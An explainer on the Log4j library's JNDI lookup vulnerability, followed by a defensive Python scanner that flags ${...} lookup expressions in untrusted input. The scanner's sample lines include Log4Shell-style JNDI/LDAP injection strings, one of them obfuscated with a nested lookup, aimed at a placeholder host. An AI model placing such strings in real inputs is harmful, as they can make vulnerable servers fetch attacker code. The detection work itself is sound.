Log4j is a popular Java library, created in 2001, whose main purpose is logging.
A logging library replaces ad-hoc print statements: the developer calls a wrapper around a logging class or object instead. So instead of print(line), the code would look like this:
logging.INFO("Application Started")
logging.WARN("File Uploaded")
logging.DEBUG("SQL Query Ran")
The application then has a configuration file that says which log levels (INFO, WARN, DEBUG, etc.) to display. This way, when there is a problem with the application, the developer can enable DEBUG mode and instantly get the messages they need to identify the issue.
Log4j's logging operation does not just record the message text; it also evaluates expressions (lookups) embedded in the logged message. That is why the Log4j vulnerability is described as an expression-based vulnerability, or an input validation vulnerability.
The vulnerability was introduced in Log4j 2 version 2.0-beta9, when the JNDI (Java Naming and Directory Interface) lookup plugin was added.
This version of Log4j allowed lookups as a way to add values to its configuration, such as Map lookups, Environment lookups, JNDI lookups and System Properties lookups.
Note: newer versions added Docker and Kubernetes lookups.
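As an added example that is not from the original post, here is a small Python checker that finds ${...} lookup expressions in untrusted input (the sample lines are constructed) and rates each line, so a defender can see which lookup names are present before such text reaches a vulnerable logger. The risk buckets and the host name placeholder.invalid are my own assumptions, not anything defined by Log4j.

```python
# Added example (not Log4j's own code): scan input for Log4j 2 lookup syntax.
HIGH_RISK = {"jndi"}                         # triggers a remote name lookup
SENSITIVE = {"env", "sys", "docker", "k8s"}  # expands process/host details

def extract_lookups(text: str) -> list[str]:
    """Return every ${...} expression in text, innermost first, so a lookup
    nested inside another one is reported on its own. An unterminated ${...
    fragment is reported too, to stay on the conservative side."""
    found, stack, i = [], [], 0
    while i < len(text):
        if text.startswith("${", i):
            stack.append(i)
            i += 2
            continue
        if text[i] == "}" and stack:
            found.append(text[stack.pop():i + 1])
        i += 1
    found.extend(text[start:] for start in stack)
    return found

def lookup_prefix(expr: str) -> str:
    """Lower-cased lookup name before the first ':' ('' if there is none)."""
    body = expr[2:-1] if expr.endswith("}") else expr[2:]
    name, sep, _ = body.partition(":")
    return name.strip().lower() if sep else ""

def classify(text: str) -> str:
    """Rate one line of untrusted input: clean / low / medium / high."""
    lookups = extract_lookups(text)
    if not lookups:
        return "clean"
    level = "low"  # some ${...} present, but no lookup name we track
    for expr in lookups:
        # A jndi lookup, or a lookup nested inside another lookup (which has
        # no legitimate use in user-supplied text), is rated high.
        if lookup_prefix(expr) in HIGH_RISK or "${" in expr[2:]:
            return "high"
        if lookup_prefix(expr) in SENSITIVE:
            level = "medium"
    return level

# Constructed sample lines; placeholder.invalid is not a real host.
SAMPLE_LINES = [
    'GET /index.html "Mozilla/5.0"',
    "GET /search q=${env:HOME}",
    "GET /login ua=${jndi:ldap://placeholder.invalid/a}",
    "POST /api body=${${lower:j}ndi:ldap://placeholder.invalid/b}",
    "price is ${amount}",
]

def scan(lines: list[str]) -> list[tuple[str, str]]:
    return [(classify(line), line) for line in lines]

if __name__ == "__main__":
    for level, line in scan(SAMPLE_LINES):
        print(f"{level:6} {line}")
```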